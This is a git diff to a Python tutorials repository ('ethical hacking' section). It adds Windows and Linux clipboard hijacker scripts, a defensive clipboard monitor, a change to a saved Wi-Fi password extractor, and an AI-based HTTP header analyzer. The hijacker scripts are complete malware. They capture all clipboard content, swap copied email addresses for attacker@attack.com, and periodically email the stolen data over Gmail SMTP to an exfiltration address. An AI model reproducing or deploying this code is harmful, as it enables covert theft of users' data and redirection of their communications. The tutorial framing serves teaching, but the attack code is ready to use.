diff --git a/README.md b/README.md
index ae2feec7..f620e0ce 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,11 @@
-
+
+
+
+
+
+
+
+
# Python Code Tutorials
@@ -21,6 +28,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Perform IP Address Spoofing in Python](https://thepythoncode.com/article/make-an-ip-spoofer-in-python-using-scapy). ([code](scapy/ip-spoofer))
- [How to See Hidden Wi-Fi Networks in Python](https://thepythoncode.com/article/uncovering-hidden-ssids-with-scapy-in-python). ([code](scapy/uncover-hidden-wifis))
- [Crafting Dummy Packets with Scapy Using Python](https://thepythoncode.com/article/crafting-packets-with-scapy-in-python). ([code](scapy/crafting-packets))
+ - [Building a Honeypot Defense System with Python and Scapy](https://thepythoncode.com/article/python-scapy-honeypot-port-scan-detection-system). ([code](scapy/honeypot-defense-system))
- [Writing a Keylogger in Python from Scratch](https://www.thepythoncode.com/article/write-a-keylogger-python). ([code](ethical-hacking/keylogger))
- [Making a Port Scanner using sockets in Python](https://www.thepythoncode.com/article/make-port-scanner-python). ([code](ethical-hacking/port_scanner))
- [How to Create a Reverse Shell in Python](https://www.thepythoncode.com/article/create-reverse-shell-python). ([code](ethical-hacking/reverse_shell))
@@ -75,6 +83,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Perform Reverse DNS Lookups Using Python](https://thepythoncode.com/article/reverse-dns-lookup-with-python). ([code](ethical-hacking/reverse-dns-lookup))
- [How to Make a Clickjacking Vulnerability Scanner in Python](https://thepythoncode.com/article/make-a-clickjacking-vulnerability-scanner-with-python). ([code](ethical-hacking/clickjacking-scanner))
- [How to Build a Custom NetCat with Python](https://thepythoncode.com/article/create-a-custom-netcat-in-python). ([code](ethical-hacking/custom-netcat/))
+ - [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python). ([code](ethical-hacking/clipboard-hijacking-tool))
- ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
- ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
@@ -98,6 +107,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [Word Error Rate in Python](https://www.thepythoncode.com/article/calculate-word-error-rate-in-python). ([code](machine-learning/nlp/wer-score))
- [How to Calculate ROUGE Score in Python](https://www.thepythoncode.com/article/calculate-rouge-score-in-python). ([code](machine-learning/nlp/rouge-score))
- [Visual Question Answering with Transformers](https://www.thepythoncode.com/article/visual-question-answering-with-transformers-in-python). ([code](machine-learning/visual-question-answering))
+ - [Building a Full-Stack RAG Chatbot with FastAPI, OpenAI, and Streamlit](https://thepythoncode.com/article/build-rag-chatbot-fastapi-openai-streamlit). ([code](https://github.com/mahdjourOussama/python-learning/tree/master/chatbot-rag))
- ### [Computer Vision](https://www.thepythoncode.com/topic/computer-vision)
- [How to Detect Human Faces in Python using OpenCV](https://www.thepythoncode.com/article/detect-faces-opencv-python). ([code](machine-learning/face_detection))
- [How to Make an Image Classifier in Python using TensorFlow and Keras](https://www.thepythoncode.com/article/image-classification-keras-python). ([code](machine-learning/image-classifier))
@@ -180,6 +190,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Query the Ethereum Blockchain with Python](https://www.thepythoncode.com/article/query-ethereum-blockchain-with-python). ([code](general/query-ethereum))
- [Data Cleaning with Pandas in Python](https://www.thepythoncode.com/article/data-cleaning-using-pandas-in-python). ([code](general/data-cleaning-pandas))
- [How to Minify CSS with Python](https://www.thepythoncode.com/article/minimize-css-files-in-python). ([code](general/minify-css))
+ - [Build a real MCP client and server in Python with FastMCP (Todo Manager example)](https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager). ([code](general/fastmcp-mcp-client-server-todo-manager))
@@ -288,6 +299,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
- [How to Compress Images in Python](https://www.thepythoncode.com/article/compress-images-in-python). ([code](python-for-multimedia/compress-image))
- [How to Remove Metadata from an Image in Python](https://thepythoncode.com/article/how-to-clear-image-metadata-in-python). ([code](python-for-multimedia/remove-metadata-from-images))
- [How to Create Videos from Images in Python](https://thepythoncode.com/article/create-a-video-from-images-opencv-python). ([code](python-for-multimedia/create-video-from-images))
+ - [How to Recover Deleted Files with Python](https://thepythoncode.com/article/how-to-recover-deleted-file-with-python). ([code](python-for-multimedia/recover-deleted-files))
- ### [Web Programming](https://www.thepythoncode.com/topic/web-programming)
- [Detecting Fraudulent Transactions in a Streaming Application using Kafka in Python](https://www.thepythoncode.com/article/detect-fraudulent-transactions-with-apache-kafka-in-python). ([code](general/detect-fraudulent-transactions))
diff --git a/ethical-hacking/clipboard-hijacking-tool/README.md b/ethical-hacking/clipboard-hijacking-tool/README.md
new file mode 100644
index 00000000..05a3f405
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/README.md
@@ -0,0 +1,2 @@
+# [Building a ClipBoard Hijacking Malware with Python](https://thepythoncode.com/article/build-a-clipboard-hijacking-tool-with-python)
+This project demonstrates how to create a clipboard hijacking malware using Python. The malware monitors the clipboard for any changes and replaces the copied content with a predefined message or malicious link.
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
new file mode 100644
index 00000000..0fcbaeb0
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker.py
@@ -0,0 +1,211 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration
+Monitors clipboard, hijacks emails, and exfiltrates collected data via email
+"""
+
+import win32clipboard
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "addyours@gmail.com"
+CHECK_INTERVAL = 1 # seconds between clipboard checks
+SEND_INTERVAL = 20 # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465 # Using SSL port like the working test
+SMTP_USERNAME = "addyours@gmail.com"
+SMTP_PASSWORD = "add yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+def get_clipboard_text():
+ """Safely get text from clipboard"""
+ try:
+ win32clipboard.OpenClipboard()
+ try:
+ data = win32clipboard.GetClipboardData(win32clipboard.CF_TEXT)
+ if data:
+ return data.decode('utf-8').rstrip()
+ return None
+ except TypeError:
+ # Clipboard doesn't contain text
+ return None
+ finally:
+ win32clipboard.CloseClipboard()
+ except Exception as e:
+ return None
+
+def set_clipboard_text(text):
+ """Safely set clipboard text"""
+ try:
+ win32clipboard.OpenClipboard()
+ win32clipboard.EmptyClipboard()
+ win32clipboard.SetClipboardText(text, win32clipboard.CF_TEXT)
+ win32clipboard.CloseClipboard()
+ return True
+ except Exception as e:
+ try:
+ win32clipboard.CloseClipboard()
+ except:
+ pass
+ return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+ """Send collected clipboard data via email"""
+
+ if not clipboard_data and not hijacked_emails:
+ print("[*] No data to exfiltrate, skipping email")
+ return False
+
+ try:
+ # Create email
+ msg = MIMEMultipart()
+ msg['From'] = SMTP_USERNAME
+ msg['To'] = EXFILTRATION_EMAIL
+ msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+
+ # Build email body
+ body = "="*60 + "\n"
+ body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+ body += "="*60 + "\n\n"
+ body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+ body += f"Total Items Collected: {len(clipboard_data)}\n"
+ body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+ body += "\n" + "="*60 + "\n"
+
+ # Clipboard data section
+ if clipboard_data:
+ body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+ body += "\nAll captured clipboard content (comma-separated):\n"
+ body += ", ".join(clipboard_data)
+ body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+ for i, item in enumerate(clipboard_data, 1):
+ body += f"{i}. {item}\n"
+
+ # Hijacked emails section
+ if hijacked_emails:
+ body += "\n" + "="*60 + "\n"
+ body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+ body += "Comma-separated list:\n"
+ body += ", ".join(hijacked_emails)
+ body += "\n\nDetailed list:\n"
+ for i, email in enumerate(hijacked_emails, 1):
+ body += f"{i}. {email}\n"
+
+ body += "\n" + "="*60 + "\n"
+ body += "End of Report\n"
+ body += "="*60 + "\n"
+
+ msg.attach(MIMEText(body, 'plain'))
+
+ # Send email using SMTP_SSL (exactly like the working test email)
+ print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+ with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+ server.login(SMTP_USERNAME, SMTP_PASSWORD)
+ server.send_message(msg)
+
+ print(f"[+] Successfully sent exfiltration email!")
+ print(f" - Clipboard items: {len(clipboard_data)}")
+ print(f" - Hijacked emails: {len(hijacked_emails)}\n")
+
+ return True
+
+ except smtplib.SMTPAuthenticationError:
+ print("[ERROR] SMTP Authentication failed!")
+ print("[!] Make sure you're using a Gmail App Password, not your regular password")
+ print("[!] Generate one at: https://myaccount.google.com/apppasswords")
+ return False
+ except Exception as e:
+ print(f"[ERROR] Failed to send email: {e}")
+ import traceback
+ traceback.print_exc()
+ return False
+
+def main():
+ """Main clipboard monitoring loop with periodic exfiltration"""
+ global clipboard_data, hijacked_emails
+
+ print("="*60)
+ print("Clipboard Email Hijacker with Data Exfiltration")
+ print("="*60)
+ print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+ print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+ print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+ print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+ print("[+] Press Ctrl+C to stop and exit\n")
+
+ hijack_count = 0
+ last_hijacked = None
+ last_send_time = time()
+ last_clipboard_content = None
+
+ try:
+ while True:
+ current_time = time()
+
+ # Get clipboard content
+ data = get_clipboard_text()
+
+ # Store ALL clipboard content (not just emails)
+ if data and data != last_clipboard_content:
+ clipboard_data.append(data)
+ last_clipboard_content = data
+ print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+
+ # Check if it's an email and hijack it
+ if data and re.search(EMAIL_REGEX, data):
+ if data != ATTACKER_EMAIL and data != last_hijacked:
+ print(f"[!] EMAIL DETECTED: {data}")
+
+ # Record the original email before hijacking
+ hijacked_emails.append(data)
+
+ if set_clipboard_text(ATTACKER_EMAIL):
+ hijack_count += 1
+ last_hijacked = data
+ print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+ print(f"[*] Total hijacks: {hijack_count}\n")
+
+ # Check if it's time to send exfiltration email
+ if current_time - last_send_time >= SEND_INTERVAL:
+ if send_exfiltration_email(clipboard_data, hijacked_emails):
+ # Clear the data after successful send
+ clipboard_data = []
+ hijacked_emails = []
+ print("[+] Data cleared, starting new collection cycle\n")
+
+ last_send_time = current_time
+
+ sleep(CHECK_INTERVAL)
+
+ except KeyboardInterrupt:
+ print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+ print(f"[*] Total emails hijacked: {hijack_count}")
+
+ # Send any remaining data before exit
+ if clipboard_data or hijacked_emails:
+ print("\n[*] Sending final exfiltration email with remaining data...")
+ send_exfiltration_email(clipboard_data, hijacked_emails)
+
+ print("\n[+] Program exited successfully")
+ sys.exit(0)
+
+ except Exception as e:
+ print(f"\n[ERROR] Unexpected error: {e}")
+ import traceback
+ traceback.print_exc()
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
new file mode 100644
index 00000000..d1c78ab1
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_hijacker_linux.py
@@ -0,0 +1,251 @@
+"""
+Clipboard Email Hijacker with Email Exfiltration - Linux Version
+"""
+
+import re
+from time import sleep, time
+import sys
+import smtplib
+from email.mime.text import MIMEText
+from email.mime.multipart import MIMEMultipart
+from datetime import datetime
+import subprocess
+import os
+
+# Configuration
+ATTACKER_EMAIL = "attacker@attack.com"
+EXFILTRATION_EMAIL = "ADD YOURS@gmail.com"
+CHECK_INTERVAL = 1 # seconds between clipboard checks
+SEND_INTERVAL = 20 # seconds between sending collected data
+EMAIL_REGEX = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
+
+# Gmail SMTP Configuration
+SMTP_SERVER = "smtp.gmail.com"
+SMTP_PORT = 465
+SMTP_USERNAME = "ADD YOURS@gmail.com"
+SMTP_PASSWORD = "ADD Yours"
+
+# Data collection storage
+clipboard_data = []
+hijacked_emails = []
+
+# Detect clipboard tool
+CLIPBOARD_TOOL = None
+if os.system("which xclip > /dev/null 2>&1") == 0:
+ CLIPBOARD_TOOL = "xclip"
+elif os.system("which xsel > /dev/null 2>&1") == 0:
+ CLIPBOARD_TOOL = "xsel"
+elif os.system("which wl-paste > /dev/null 2>&1") == 0:
+ CLIPBOARD_TOOL = "wayland"
+else:
+ print("[ERROR] No clipboard tool found!")
+ print("[!] Install: sudo apt-get install xclip")
+ sys.exit(1)
+
+def get_clipboard_text():
+ """Safely get text from clipboard"""
+ try:
+ if CLIPBOARD_TOOL == "xclip":
+ result = subprocess.run(
+ ["xclip", "-selection", "clipboard", "-o"],
+ capture_output=True,
+ text=True,
+ timeout=2
+ )
+ elif CLIPBOARD_TOOL == "xsel":
+ result = subprocess.run(
+ ["xsel", "--clipboard", "--output"],
+ capture_output=True,
+ text=True,
+ timeout=2
+ )
+ elif CLIPBOARD_TOOL == "wayland":
+ result = subprocess.run(
+ ["wl-paste"],
+ capture_output=True,
+ text=True,
+ timeout=2
+ )
+ else:
+ return None
+
+ if result.returncode == 0:
+ return result.stdout.rstrip()
+ return None
+ except:
+ return None
+
+def set_clipboard_text(text):
+ """Safely set clipboard text"""
+ try:
+ if CLIPBOARD_TOOL == "xclip":
+ process = subprocess.Popen(
+ ["xclip", "-selection", "clipboard", "-i"],
+ stdin=subprocess.PIPE
+ )
+ elif CLIPBOARD_TOOL == "xsel":
+ process = subprocess.Popen(
+ ["xsel", "--clipboard", "--input"],
+ stdin=subprocess.PIPE
+ )
+ elif CLIPBOARD_TOOL == "wayland":
+ process = subprocess.Popen(
+ ["wl-copy"],
+ stdin=subprocess.PIPE
+ )
+ else:
+ return False
+
+ process.communicate(input=text.encode('utf-8'), timeout=2)
+ return process.returncode == 0
+ except:
+ return False
+
+def send_exfiltration_email(clipboard_data, hijacked_emails):
+ """Send collected clipboard data via email"""
+
+ if not clipboard_data and not hijacked_emails:
+ print("[*] No data to exfiltrate, skipping email")
+ return False
+
+ try:
+ # Create email
+ msg = MIMEMultipart()
+ msg['From'] = SMTP_USERNAME
+ msg['To'] = EXFILTRATION_EMAIL
+ msg['Subject'] = f"Clipboard Data Exfiltration - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}"
+
+ # Build email body
+ body = "="*60 + "\n"
+ body += "CLIPBOARD DATA EXFILTRATION REPORT\n"
+ body += "="*60 + "\n\n"
+ body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+ body += f"Total Items Collected: {len(clipboard_data)}\n"
+ body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+ body += "\n" + "="*60 + "\n"
+
+ # Clipboard data section
+ if clipboard_data:
+ body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+ body += "\nAll captured clipboard content (comma-separated):\n"
+ body += ", ".join(clipboard_data)
+ body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+ for i, item in enumerate(clipboard_data, 1):
+ body += f"{i}. {item}\n"
+
+ # Hijacked emails section
+ if hijacked_emails:
+ body += "\n" + "="*60 + "\n"
+ body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+ body += "Comma-separated list:\n"
+ body += ", ".join(hijacked_emails)
+ body += "\n\nDetailed list:\n"
+ for i, email in enumerate(hijacked_emails, 1):
+ body += f"{i}. {email}\n"
+
+ body += "\n" + "="*60 + "\n"
+ body += "End of Report\n"
+ body += "="*60 + "\n"
+
+ msg.attach(MIMEText(body, 'plain'))
+
+ # Send email using SMTP_SSL
+ print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+ with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+ server.login(SMTP_USERNAME, SMTP_PASSWORD)
+ server.send_message(msg)
+
+ print(f"[+] Successfully sent exfiltration email!")
+ print(f" - Clipboard items: {len(clipboard_data)}")
+ print(f" - Hijacked emails: {len(hijacked_emails)}\n")
+
+ return True
+
+ except smtplib.SMTPAuthenticationError:
+ print("[ERROR] SMTP Authentication failed!")
+ print("[!] Make sure you're using a Gmail App Password, not your regular password")
+ return False
+ except Exception as e:
+ print(f"[ERROR] Failed to send email: {e}")
+ import traceback
+ traceback.print_exc()
+ return False
+
+def main():
+ """Main clipboard monitoring loop with periodic exfiltration"""
+ global clipboard_data, hijacked_emails
+
+ print("="*60)
+ print("Clipboard Email Hijacker - Linux Version")
+ print("="*60)
+ print(f"[+] Clipboard tool: {CLIPBOARD_TOOL}")
+ print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+ print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+ print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+ print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+ print("[+] Press Ctrl+C to stop and exit\n")
+
+ hijack_count = 0
+ last_hijacked = None
+ last_send_time = time()
+ last_clipboard_content = None
+
+ try:
+ while True:
+ current_time = time()
+
+ # Get clipboard content
+ data = get_clipboard_text()
+
+ # Store ALL clipboard content (not just emails)
+ if data and data != last_clipboard_content:
+ clipboard_data.append(data)
+ last_clipboard_content = data
+ print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+
+ # Check if it's an email and hijack it
+ if data and re.search(EMAIL_REGEX, data):
+ if data != ATTACKER_EMAIL and data != last_hijacked:
+ print(f"[!] EMAIL DETECTED: {data}")
+
+ # Record the original email before hijacking
+ hijacked_emails.append(data)
+
+ if set_clipboard_text(ATTACKER_EMAIL):
+ hijack_count += 1
+ last_hijacked = data
+ print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+ print(f"[*] Total hijacks: {hijack_count}\n")
+
+ # Check if it's time to send exfiltration email
+ if current_time - last_send_time >= SEND_INTERVAL:
+ if send_exfiltration_email(clipboard_data, hijacked_emails):
+ # Clear the data after successful send
+ clipboard_data = []
+ hijacked_emails = []
+ print("[+] Data cleared, starting new collection cycle\n")
+
+ last_send_time = current_time
+
+ sleep(CHECK_INTERVAL)
+
+ except KeyboardInterrupt:
+ print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+ print(f"[*] Total emails hijacked: {hijack_count}")
+
+ # Send any remaining data before exit
+ if clipboard_data or hijacked_emails:
+ print("\n[*] Sending final exfiltration email with remaining data...")
+ send_exfiltration_email(clipboard_data, hijacked_emails)
+
+ print("\n[+] Program exited successfully")
+ sys.exit(0)
+
+ except Exception as e:
+ print(f"\n[ERROR] Unexpected error: {e}")
+ import traceback
+ traceback.print_exc()
+ sys.exit(1)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
new file mode 100644
index 00000000..5d3fcebc
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
@@ -0,0 +1,79 @@
+import win32gui
+import win32api
+import ctypes
+from win32clipboard import GetClipboardOwner
+from win32process import GetWindowThreadProcessId
+from psutil import Process
+import winsound
+import sys
+import signal
+
+def handle_clipboard_event(window_handle, message, w_param, l_param):
+ if message == 0x031D: # WM_CLIPBOARDUPDATE
+ try:
+ clipboard_owner_window = GetClipboardOwner()
+ process_id = GetWindowThreadProcessId(clipboard_owner_window)[1]
+ process = Process(process_id)
+ process_name = process.name()
+
+ # Successfully identified the process - no beep
+ print("Clipboard modified by %s" % process_name)
+
+ except Exception:
+ # Could not identify the process - BEEP!
+ print("Clipboard modified by unknown process")
+ winsound.Beep(1000, 300)
+
+ return 0
+
+
+def create_listener_window():
+ window_class = win32gui.WNDCLASS()
+ window_class.lpfnWndProc = handle_clipboard_event
+ window_class.lpszClassName = 'clipboardListener'
+ window_class.hInstance = win32api.GetModuleHandle(None)
+
+ class_atom = win32gui.RegisterClass(window_class)
+
+ return win32gui.CreateWindow(
+ class_atom,
+ 'clipboardListener',
+ 0,
+ 0, 0, 0, 0,
+ 0, 0,
+ window_class.hInstance,
+ None
+ )
+
+
+def signal_handler(sig, frame):
+ print("\n[+] Exiting...")
+ sys.exit(0)
+
+
+def start_clipboard_monitor():
+ print("[+] Clipboard listener started")
+ print("[+] Press Ctrl+C to exit\n")
+
+ # Set up signal handler for Ctrl+C
+ signal.signal(signal.SIGINT, signal_handler)
+
+ listener_window = create_listener_window()
+ ctypes.windll.user32.AddClipboardFormatListener(listener_window)
+
+ # Pump messages but check for exit condition
+ try:
+ while True:
+ # Process messages with a timeout to allow checking for exit
+ if win32gui.PumpWaitingMessages() != 0:
+ break
+ win32api.Sleep(100) # Sleep a bit to prevent high CPU usage
+ except KeyboardInterrupt:
+ print("\n[+] Exiting...")
+ finally:
+ # Clean up - remove clipboard listener
+ ctypes.windll.user32.RemoveClipboardFormatListener(listener_window)
+
+
+if __name__ == "__main__":
+ start_clipboard_monitor()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/requirements.txt b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
new file mode 100644
index 00000000..afd24f6a
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
@@ -0,0 +1 @@
+pywin32
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/README.md b/ethical-hacking/get-wifi-passwords/README.md
index e24eda7f..a10efc10 100644
--- a/ethical-hacking/get-wifi-passwords/README.md
+++ b/ethical-hacking/get-wifi-passwords/README.md
@@ -1 +1,3 @@
-# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
\ No newline at end of file
+# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
+
+This program lists saved Wi-Fi networks and their passwords on Windows and Linux machines. In addition to the SSID (Wi-Fi network name) and passwords, the output also shows the network’s security type and ciphers.
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
index 0afd70ca..ff32f6f8 100644
--- a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
+++ b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
@@ -28,10 +28,16 @@ def get_windows_saved_wifi_passwords(verbose=1):
[list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"]
"""
ssids = get_windows_saved_ssids()
- Profile = namedtuple("Profile", ["ssid", "ciphers", "key"])
+ Profile = namedtuple("Profile", ["ssid", "security", "ciphers", "key"])
profiles = []
for ssid in ssids:
ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode()
+
+ #get the security type
+ security = re.findall(r"Authentication\s(.*)", ssid_details)
+ # clear spaces and colon
+ security = "/".join(dict.fromkeys(c.strip().strip(":").strip() for c in security))
+
# get the ciphers
ciphers = re.findall(r"Cipher\s(.*)", ssid_details)
# clear spaces and colon
@@ -43,7 +49,7 @@ def get_windows_saved_wifi_passwords(verbose=1):
key = key[0].strip().strip(":").strip()
except IndexError:
key = "None"
- profile = Profile(ssid=ssid, ciphers=ciphers, key=key)
+ profile = Profile(ssid=ssid, security=security, ciphers=ciphers, key=key)
if verbose >= 1:
print_windows_profile(profile)
profiles.append(profile)
@@ -52,12 +58,13 @@ def get_windows_saved_wifi_passwords(verbose=1):
def print_windows_profile(profile):
"""Prints a single profile on Windows"""
- print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+ #print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+ print(f"{profile.ssid:25}{profile.security:30}{profile.ciphers:35}{profile.key:50}")
def print_windows_profiles(verbose):
"""Prints all extracted SSIDs along with Key on Windows"""
- print("SSID CIPHER(S) KEY")
+ print("SSID Securities CIPHER(S) KEY")
print("-"*50)
get_windows_saved_wifi_passwords(verbose)
diff --git a/ethical-hacking/http-security-headers/README.md b/ethical-hacking/http-security-headers/README.md
new file mode 100644
index 00000000..e0e7b1d0
--- /dev/null
+++ b/ethical-hacking/http-security-headers/README.md
@@ -0,0 +1,2 @@
+Grab your API key from Open Router:- https://openrouter.ai/
+Model is Used is DeepSeek: DeepSeek V3.1 (free). However, feel free to try others.
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/http_security_headers.py b/ethical-hacking/http-security-headers/http_security_headers.py
new file mode 100644
index 00000000..67b494c4
--- /dev/null
+++ b/ethical-hacking/http-security-headers/http_security_headers.py
@@ -0,0 +1,149 @@
+#!/usr/bin/env python3
+import requests
+import json
+import os
+import argparse
+from typing import Dict, List, Tuple
+from openai import OpenAI
+
+class SecurityHeadersAnalyzer:
+ def __init__(self, api_key: str = None, base_url: str = None, model: str = None):
+ self.api_key = api_key or os.getenv('OPENROUTER_API_KEY') or os.getenv('OPENAI_API_KEY')
+ self.base_url = base_url or os.getenv('OPENROUTER_BASE_URL', 'https://openrouter.ai/api/v1')
+ self.model = model or os.getenv('LLM_MODEL', 'deepseek/deepseek-chat-v3.1:free')
+
+ if not self.api_key:
+ raise ValueError("API key is required. Set OPENROUTER_API_KEY or provide --api-key")
+
+ self.client = OpenAI(base_url=self.base_url, api_key=self.api_key)
+
+ def fetch_headers(self, url: str, timeout: int = 10) -> Tuple[Dict[str, str], int]:
+ """Fetch HTTP headers from URL"""
+ if not url.startswith(('http://', 'https://')):
+ url = 'https://' + url
+
+ try:
+ response = requests.get(url, timeout=timeout, allow_redirects=True)
+ return dict(response.headers), response.status_code
+ except requests.exceptions.RequestException as e:
+ print(f"Error fetching {url}: {e}")
+ return {}, 0
+
+ def analyze_headers(self, url: str, headers: Dict[str, str], status_code: int) -> str:
+ """Analyze headers using LLM"""
+ prompt = f"""Analyze the HTTP security headers for {url} (Status: {status_code})
+
+Headers:
+{json.dumps(headers, indent=2)}
+
+Provide a comprehensive security analysis including:
+1. Security score (0-100) and overall assessment
+2. Critical security issues that need immediate attention
+3. Missing important security headers
+4. Analysis of existing security headers and their effectiveness
+5. Specific recommendations for improvement
+6. Potential security risks based on current configuration
+
+Focus on practical, actionable advice following current web security best practices. Please do not include ** and #
+in the response except for specific references where necessary. use numbers, romans, alphabets instead Format the response well please. """
+
+ try:
+ completion = self.client.chat.completions.create(
+ model=self.model,
+ messages=[{"role": "user", "content": prompt}],
+ temperature=0.2
+ )
+ return completion.choices[0].message.content
+ except Exception as e:
+ return f"Analysis failed: {e}"
+
+ def analyze_url(self, url: str, timeout: int = 10) -> Dict:
+ """Analyze a single URL"""
+ print(f"\nAnalyzing: {url}")
+ print("-" * 50)
+
+ headers, status_code = self.fetch_headers(url, timeout)
+ if not headers:
+ return {"url": url, "error": "Failed to fetch headers"}
+
+ print(f"Status Code: {status_code}")
+ print(f"\nHTTP Headers ({len(headers)} found):")
+ print("-" * 30)
+ for key, value in headers.items():
+ print(f"{key}: {value}")
+
+ print(f"\nAnalyzing with AI...")
+ analysis = self.analyze_headers(url, headers, status_code)
+
+ print("\nSECURITY ANALYSIS")
+ print("=" * 50)
+ print(analysis)
+
+ return {
+ "url": url,
+ "status_code": status_code,
+ "headers_count": len(headers),
+ "analysis": analysis,
+ "raw_headers": headers
+ }
+
+ def analyze_multiple_urls(self, urls: List[str], timeout: int = 10) -> List[Dict]:
+ """Analyze multiple URLs"""
+ results = []
+ for i, url in enumerate(urls, 1):
+ print(f"\n[{i}/{len(urls)}]")
+ result = self.analyze_url(url, timeout)
+ results.append(result)
+ return results
+
+ def export_results(self, results: List[Dict], filename: str):
+ """Export results to JSON"""
+ with open(filename, 'w') as f:
+ json.dump(results, f, indent=2, ensure_ascii=False)
+ print(f"\nResults exported to: {filename}")
+
+def main():
+ parser = argparse.ArgumentParser(
+ description='Analyze HTTP security headers using AI',
+ formatter_class=argparse.RawDescriptionHelpFormatter,
+ epilog='''Examples:
+ python security_headers.py https://example.com
+ python security_headers.py example.com google.com
+ python security_headers.py example.com --export results.json
+
+Environment Variables:
+ OPENROUTER_API_KEY - API key for OpenRouter
+ OPENAI_API_KEY - API key for OpenAI
+ LLM_MODEL - Model to use (default: deepseek/deepseek-chat-v3.1:free)'''
+ )
+
+ parser.add_argument('urls', nargs='+', help='URLs to analyze')
+ parser.add_argument('--api-key', help='API key for LLM service')
+ parser.add_argument('--base-url', help='Base URL for LLM API')
+ parser.add_argument('--model', help='LLM model to use')
+ parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10s)')
+ parser.add_argument('--export', help='Export results to JSON file')
+
+ args = parser.parse_args()
+
+ try:
+ analyzer = SecurityHeadersAnalyzer(
+ api_key=args.api_key,
